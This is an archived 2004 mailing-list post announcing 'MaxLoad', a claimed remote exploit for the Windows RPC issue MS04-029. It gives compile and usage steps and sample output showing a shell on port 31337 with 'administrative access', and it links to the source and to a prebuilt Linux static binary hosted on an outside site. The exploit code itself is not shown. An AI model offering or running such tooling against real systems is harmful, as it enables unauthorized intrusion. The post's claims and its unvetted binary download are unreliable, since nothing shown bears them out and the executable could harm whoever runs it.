[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <E1CPQab-00050n-N3@silver.blockstatus.net>
From: hjtoi at comcast.net (Heikki Toivonen)
Subject: New Remote Windows Exploit (MS04-029)
/*
* Date: 2004/10/30
* Maxload load_max@...oo.com
*
* Exploit for \"Vulnerability in RPC Runtime Library\"
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows 2000 (SP3 SP4)
* Windows XP (SP1 SP2)
* Windows NT4 (SP6a)
*
* EXPLOIT IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
* I TAKE NO RESPONSIBILITY FOR ANY USE OF THIS CODE.
*
*
* Instructions:
*
* [user@...alhost] $ gcc -o maxload maxload.c
* [user@...alhost] $ ./maxload
* *** MaxLoad (windows rpc exploit) v.1 ***
*
* For educational propose only!
* error: you must enter a valid ip
* usage:./maxload [IP-ADDRESS]
* e.g: ./maxload 192.168.1.23
*
*
* [user@...alhost] $ ./maxload 192.168.1.2
* *** MaxLoad (windows rpc exploit) v.1 ***
* For educational propose only!
* Succes! Try connect to 192.168.1.2 port 31337
*
*
* [user@...alhost] $ telnet 192.168.1.2 31337
* Connected to 192.168.1.2.
* Escape character is \'^]\'.
*
* Microsoft Windows XP [Version 5.1.2600]
* © Copyright 1985-2001 Microsoft Corp.
*
* C:\\>
*
* Bang, here you go, administrative access..
*
*/
Do i need too say more :D
https://fri-adgang.dk/?get=1056]maxload.c (source code)
https://fri-adgang.dk/?get=1055]maxload (linux static binary)
-MaxLoad
Powered by blists - more mailing lists